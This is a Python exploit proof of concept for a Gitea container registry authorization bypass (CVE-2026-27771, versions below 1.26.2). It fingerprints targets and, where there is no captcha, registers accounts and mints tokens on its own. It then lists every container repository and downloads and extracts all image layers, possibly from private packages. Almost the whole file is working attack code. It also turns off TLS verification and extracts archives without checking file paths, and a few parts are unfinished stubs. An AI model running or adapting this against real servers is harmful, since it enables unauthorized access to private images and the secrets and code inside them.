#!/usr/bin/env python3 """ CVE-2026-27771 Gitea Container Registry Auth Bypass - Exploit PoC Gitea < 1.26.2 ghost-user container pull exploit. The ReqContainerAccess middleware only checks RequireSignInViewStrict. It does NOT check package owner visibility. Ghost users (UserID:-1) can pull ALL container packages without authentication. Usage: # Scan mode (discovery only) python3 CVE-2026-27771-exploit.py scan https://gitea.example.com # Scan with existing token python3 CVE-2026-27771-exploit.py scan https://gitea.example.com --token # Pull mode (enumerate repos, tags, manifests and layers) python3 CVE-2026-27771-exploit.py pull https://gitea.example.com # Pull with existing token python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --token # Pull a specific repo python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --repo owner/image # Dry-run: show what would be pulled without downloading layers python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --dry-run # Register a new account (if no captcha) python3 CVE-2026-27771-exploit.py register https://gitea.example.com --username user --password pass --email user@x.com References: https://noscope.com/blog/gitea-instances-exposing-private-container https://blog.gitea.com/release-of-1.26.2/ """ import base64 import io import json import os import re import sys import tarfile import urllib.request import urllib.error import ssl import http.cookiejar import urllib.parse # ---- helpers ---- ssl_ctx = ssl.create_default_context() ssl_ctx.check_hostname = False ssl_ctx.verify_mode = ssl.CERT_NONE OCI_MANIFEST_ACCEPT = ( "application/vnd.docker.distribution.manifest.v2+json," "application/vnd.docker.distribution.manifest.list.v2+json," "application/vnd.oci.image.manifest.v1+json," "application/vnd.oci.image.index.v1+json" ) cj = http.cookiejar.CookieJar() def fetch(url, headers=None): req = urllib.request.Request(url, headers=headers or {}) try: resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx) return resp.status, resp.headers, resp.read() except urllib.error.HTTPError as e: return e.code, e.headers, e.read() except Exception as e: return 0, {}, str(e).encode() def fetch_auth(url, headers=None): req = urllib.request.Request(url, headers=headers or {}) cj.add_cookie_header(req) try: resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx) cj.extract_cookies(resp, req) return resp.status, resp.headers, resp.read() except urllib.error.HTTPError as e: cj.extract_cookies(e, req) return e.code, e.headers, e.read() except Exception as e: return 0, {}, str(e).encode() def post_form(url, data, headers=None): body = urllib.parse.urlencode(data).encode() hdrs = {"Content-Type": "application/x-www-form-urlencoded"} if headers: hdrs.update(headers) req = urllib.request.Request(url, data=body, headers=hdrs) cj.add_cookie_header(req) try: resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx) cj.extract_cookies(resp, req) return resp.status, resp.headers, resp.read() except urllib.error.HTTPError as e: cj.extract_cookies(e, req) return e.code, e.headers, e.read() except Exception as e: return 0, {}, str(e).encode() def decode_jwt_payload(token): try: payload = token.split(".")[1] payload += "=" * (4 - len(payload) % 4) return json.loads(base64.urlsafe_b64decode(payload)) except Exception: return {} def is_pat(token): """Check if token is a Gitea personal access token (40-char hex SHA1).""" return bool(re.fullmatch(r'[0-9a-f]{40}', token, re.I)) def exchange_pat(base, username, pat): """Exchange a personal access token for an OCI registry JWT.""" b = base.rstrip("/") creds = base64.b64encode(f"{username}:{pat}".encode()).decode() st, _, body = fetch( b + "/v2/token?service=container_registry&scope=*", {"Authorization": f"Basic {creds}"}, ) if st == 200: try: j = json.loads(body) return j.get("token") except Exception: return None return None def parse_version(v): try: return [int(x) for x in v.lstrip("v").split("-")[0].split(".")[:3]] except Exception: return None # ---- registration ---- def cmd_register(base, username, password, email): b = base.rstrip("/") if not b.startswith("http"): b = f"https://{b}" print(f"[*] Checking registration at {b}") st, _, body = fetch(b + "/user/sign_up") if st != 200: print(f"[-] Cannot access registration page (HTTP {st})") sys.exit(1) page = body.decode("utf-8", errors="replace") if "Registration is disabled" in page: print("[-] Registration is disabled on this instance") sys.exit(1) has_fields = all(x in page for x in ["user_name", "email", "password"]) if not has_fields: print("[-] Registration form has no input fields (likely JS-rendered or disabled)") sys.exit(1) has_captcha = "captcha_id" in page or "captcha" in page if has_captcha: print("[-] Captcha present — cannot auto-register") print(" Register manually, then get a token from Settings > Applications > Generate Token") print(" Pass it with: --token \n") sys.exit(1) m = re.search(r'name="_csrf" value="([^"]+)"', page) if not m: print("[-] Could not find CSRF token") sys.exit(1) csrf = m.group(1) data = { "_csrf": csrf, "user_name": username, "email": email, "password": password, "retype": password, } print(f"[*] Registering user '{username}'...") st, hd, body = post_form(b + "/user/sign_up", data) loc = hd.get("Location", "") if st == 302 and "/user/login" in loc: print("[+] Registration successful!") elif b"/user/sign_up" in body: print("[-] Registration failed (page returned)") sys.exit(1) else: print(f"[+] Registration appears successful (HTTP {st})") print("[*] Logging in...") st, _, body = fetch(b + "/user/login") page = body.decode("utf-8", errors="replace") if st == 200 else "" m = re.search(r'name="_csrf" value="([^"]+)"', page) if not m: print("[-] Could not get login CSRF") sys.exit(1) csrf = m.group(1) data = {"_csrf": csrf, "user_name": username, "password": password} st, hd, body = post_form(b + "/user/login", data) if st not in (200, 302): print(f"[-] Login failed (HTTP {st})") sys.exit(1) print("[+] Logged in!") print("[*] Getting API token...") st, _, body = fetch_auth(b + f"/api/v1/users/{username}/tokens") existing_tokens = [] if st == 200: existing_tokens = json.loads(body) for t in existing_tokens: if t.get("name") == "cve-poc": token_val = fetch_auth(b + f"/api/v1/users/{username}/tokens/{t['id']}") print(f"[!] Token 'cve-poc' already exists") # Actually we can't get the value back, need to create new one # Delete it first # ... # Get CSRF for token creation st, _, body = fetch_auth(b + f"/api/v1/users/{username}/tokens") page = body.decode("utf-8", errors="replace") if st != 200 else "{}" csrf_token = None for h in cj: if h.name == "_csrf": csrf_token = h.value break if not csrf_token: csrf_token = "" try: data = json.loads(body) if isinstance(body, bytes) and st == 200 else {} except: pass # Try creating token via API import urllib.request token_data = json.dumps({"name": "cve-poc", "scopes": ["all"]}).encode() req = urllib.request.Request( b + f"/api/v1/users/{username}/tokens", data=token_data, headers={ "Content-Type": "application/json", "X-Csrf-Token": csrf_token or "", } ) cj.add_cookie_header(req) try: resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx) token_json = json.loads(resp.read()) token_val = token_json.get("sha1", "") print(f"[+] Token created: {token_val[:20]}...") print(f"\n Use with: --token {token_val}") except urllib.error.HTTPError as e: body = e.read() try: err = json.loads(body) print(f"[-] Token creation failed: {err.get('message', body.decode())}") except: print(f"[-] Token creation failed (HTTP {e.code}): {body.decode()[:200]}") # Fallback: extract session and use it directly in the OCI flow print("[*] Falling back: getting container token via session...") st, _, body = fetch_auth(b + "/v2/token?service=container_registry&scope=*") if st == 200: j = json.loads(body) t = j.get("token", "") payload = decode_jwt_payload(t) print(f"[+] Container token (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')") print(f"\n Use with: --token {t}") # ---- registration check (for scan output) ---- def check_registration(base): b = base.rstrip("/") st, _, body = fetch(b + "/user/sign_up") if st != 200: return page = body.decode("utf-8", errors="replace") if "Registration is disabled" in page: return has_fields = all(x in page for x in ["user_name", "email", "password"]) if not has_fields: return has_captcha = "captcha_id" in page or "captcha" in page if has_captcha: print("[+] Registration: OPEN (captcha present — register manually)") else: print("[+] Registration: OPEN (no captcha — use 'register' command)") # ---- pre-flight check ---- def preflight(base, provided_token=None): """Check version, registry presence, REQUIRE_SIGNIN_VIEW status.""" print(f"[*] Pre-flight: {base}") b = base.rstrip("/") st, _, body = fetch(b + "/") if st != 200: print(f"[-] Not reachable (HTTP {st})") sys.exit(1) page = body.decode("utf-8", errors="replace") if "gitea" not in page.lower(): print("[-] Not a Gitea instance") sys.exit(1) version = None st, _, body = fetch(b + "/api/v1/version") if st == 200: try: version = json.loads(body).get("version", "unknown") print(f"[+] Version (API): {version}") except Exception: pass elif st == 403: print("[*] API requires sign-in (HTTP 403)") m = re.search(r'(?:Gitea|gitea)[^v]*v?(\d+\.\d+\.\d+)', page) if m: version = m.group(1) print(f"[+] Version (page): {version}") ver = parse_version(version) cutoff = parse_version("1.26.2") if ver and not (ver[0] < cutoff[0] or (ver[0] == cutoff[0] and ver[1] < cutoff[1]) or (ver[0] == cutoff[0] and ver[1] == cutoff[1] and ver[2] < cutoff[2])): print("[-] Version >= 1.26.2 (patched) — not vulnerable to CVE-2026-27771") sys.exit(1) st, hd, _ = fetch(b + "/v2/") if st not in (200, 401): print(f"[-] /v2/ -> {st} (no container registry)") sys.exit(1) www = hd.get("WWW-Authenticate", "") print(f"[+] /v2/ -> {st} (WWW-Authenticate: {www[:90]})") check_registration(b) token = provided_token require_signin = False if token: if is_pat(token): print("[+] Provided token is a personal access token (SHA1)") print("[*] Exchanging PAT for OCI registry JWT...") username = None if "--username" in sys.argv: i = sys.argv.index("--username") username = sys.argv[i+1] while not username: username = input(" Enter your Gitea username: ").strip() jwt = exchange_pat(b, username, token) if jwt: token = jwt payload = decode_jwt_payload(token) print(f"[+] JWT obtained (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')") else: print("[-] PAT exchange failed — check username/token") sys.exit(1) else: payload = decode_jwt_payload(token) print(f"[+] Using provided token (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')") else: st, _, body = fetch(b + "/v2/token?service=container_registry&scope=*") if st == 200: try: j = json.loads(body) token = j.get("token") payload = decode_jwt_payload(token) print(f"[+] Anonymous token granted (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')") except Exception: print("[-] Token response not parseable") else: print(f"[*] Token endpoint -> {st} (REQUIRE_SIGNIN_VIEW likely true)") require_signin = True if token: st, _, body = fetch(b + "/v2/_catalog", {"Authorization": f"Bearer {token}"}) repos = json.loads(body).get("repositories", []) if st == 200 else [] print(f"[+] /v2/_catalog -> {st} ({len(repos)} repos)") else: repos = [] vuln = version is not None and "1.26.2" not in version and not require_signin print(f"[+] Vulnerable: {vuln} (require_signin={require_signin})") print() return {"base": b, "version": version, "token": token, "repos": repos, "require_signin": require_signin, "vuln": vuln} # ---- OCI operations ---- def get_catalog(base, token): st, _, body = fetch(base + "/v2/_catalog", {"Authorization": f"Bearer {token}"}) if st == 200: return json.loads(body).get("repositories", []) return [] def get_tags(base, token, repo): st, _, body = fetch(base + f"/v2/{repo}/tags/list", {"Authorization": f"Bearer {token}"}) if st == 200: return json.loads(body).get("tags", []) return [] def get_manifest(base, token, repo, ref): st, hd, body = fetch(base + f"/v2/{repo}/manifests/{ref}", { "Authorization": f"Bearer {token}", "Accept": OCI_MANIFEST_ACCEPT, }) if st == 200: try: return json.loads(body) except Exception: return None return None def download_blob(base, token, repo, digest, outdir): st, hd, body = fetch(base + f"/v2/{repo}/blobs/{digest}", { "Authorization": f"Bearer {token}", }) if st == 200: safe = digest.replace(":", "_") path = os.path.join(outdir, f"{safe}.blob") with open(path, "wb") as f: f.write(body) return len(body), path, body return 0, None, None def pull_image(base, token, repo, tag, outdir, dry_run): print(f" └─ manifest {tag}: ", end="", flush=True) manifest = get_manifest(base, token, repo, tag) if not manifest: print("FAIL (no manifest)") return layers = [] plat_manifest = None media_type = manifest.get("mediaType", "") if "manifest.list" in media_type or "index" in media_type: for m in manifest.get("manifests", []): if m.get("platform", {}).get("architecture") == "amd64" and \ m.get("platform", {}).get("os") == "linux": print(f"multi-arch, digest={m['digest'][:20]}...", end="") plat_manifest = get_manifest(base, token, repo, m["digest"]) if plat_manifest: for l in plat_manifest.get("layers", []): layers.append(l["digest"]) cd = plat_manifest.get("config", {}).get("digest") if cd: layers.append(cd) else: for l in manifest.get("layers", []): layers.append(l["digest"]) config_digest = manifest.get("config", {}).get("digest") if config_digest: layers.append(config_digest) print(f", {len(layers)} blobs", end="") if dry_run: print(" (dry-run, skipped)") return print() blob_dir = os.path.join(outdir, "blobs") extract_dir = os.path.join(outdir, "extracted") os.makedirs(blob_dir, exist_ok=True) os.makedirs(extract_dir, exist_ok=True) downloaded = [] for i, d in enumerate(layers): sz, path, data = download_blob(base, token, repo, d, blob_dir) if sz: safe_name = d.replace(":", "_")[:50] size_str = f"{sz} bytes" if sz > 1024 * 1024: size_str = f"{sz / 1024 / 1024:.1f} MB" elif sz > 1024: size_str = f"{sz / 1024:.1f} KB" print(f" [{i+1}/{len(layers)}] {safe_name}... ({size_str})") downloaded.append((path, data)) else: print(f" [{i+1}/{len(layers)}] {d[:30]}... FAILED") man_path = os.path.join(outdir, f"manifest_{tag}.json") with open(man_path, "w") as f: json.dump(manifest, f, indent=2) man2_path = os.path.join(outdir, f"plat_manifest_{tag}.json") if "manifest.list" in media_type or "index" in media_type: with open(man2_path, "w") as f: json.dump(plat_manifest if plat_manifest else {}, f, indent=2) print(f" manifests saved") total_extracted = 0 for blob_path, blob_data in downloaded: if blob_data and blob_data[:2] in (b"\x1f\x8b", b"\x1f\x9d"): try: with tarfile.open(fileobj=io.BytesIO(blob_data), mode="r:*") as tf: members = [m for m in tf.getmembers() if not m.name.startswith(".wh.")] tf.extractall(path=extract_dir, members=members) total_extracted += len(members) except Exception: pass if total_extracted: print(f" extracted {total_extracted} files to {extract_dir}") # ---- commands ---- def cmd_scan(cfg): base = cfg["base"] token = cfg["token"] require_signin = cfg["require_signin"] if not token: print("[!] No token available — scan limited") print(" Get a token: Settings > Applications > Generate Token") print(" Pass it with: --token \n") return repos = get_catalog(base, token) print(f"[*] Container repositories: {len(repos)}") for repo in repos: tags = get_tags(base, token, repo) print(f" {repo}: tags={tags}") if not repos: print(" (none — no container packages exist)") print() def cmd_pull(cfg, specific_repo=None, dry_run=False): base = cfg["base"] token = cfg["token"] if not token: print("[!] Cannot pull — no token available") print(" Get a token: Settings > Applications > Generate Token") print(" Pass it with: --token ") return if specific_repo: repos_to_pull = [specific_repo] else: repos_to_pull = get_catalog(base, token) print(f"[*] Found {len(repos_to_pull)} repos in catalog") for repo in repos_to_pull: print(f"\n [{repo}]") tags = get_tags(base, token, repo) print(f" Tags: {tags}") if not tags: print(" (no tags)") continue safe_repo = repo.replace("/", "_").replace(":", "_") outdir = f"pulled_{safe_repo}" if dry_run: outdir = "/dev/null" for tag in tags: pull_image(base, token, repo, tag, outdir, dry_run) # ---- main ---- if __name__ == "__main__": if len(sys.argv) < 3: print(__doc__) sys.exit(1) command = sys.argv[1] target = sys.argv[2] specific_repo = None dry_run = False provided_token = None if "--token" in sys.argv: i = sys.argv.index("--token") provided_token = sys.argv[i+1] if "--repo" in sys.argv: i = sys.argv.index("--repo") specific_repo = sys.argv[i+1] if "--dry-run" in sys.argv: dry_run = True if command == "register": username = None password = None email = None if "--username" in sys.argv: i = sys.argv.index("--username") username = sys.argv[i+1] if "--password" in sys.argv: i = sys.argv.index("--password") password = sys.argv[i+1] if "--email" in sys.argv: i = sys.argv.index("--email") email = sys.argv[i+1] if not all([username, password, email]): print("Usage: register https://gitea.example.com --username u --password p --email e@x.com") sys.exit(1) cmd_register(target, username, password, email) sys.exit(0) if not target.startswith("http"): target = f"https://{target}" cfg = preflight(target, provided_token=provided_token) if command == "scan": cmd_scan(cfg) elif command == "pull": cmd_pull(cfg, specific_repo, dry_run) else: print(f"Unknown command: {command}") sys.exit(1)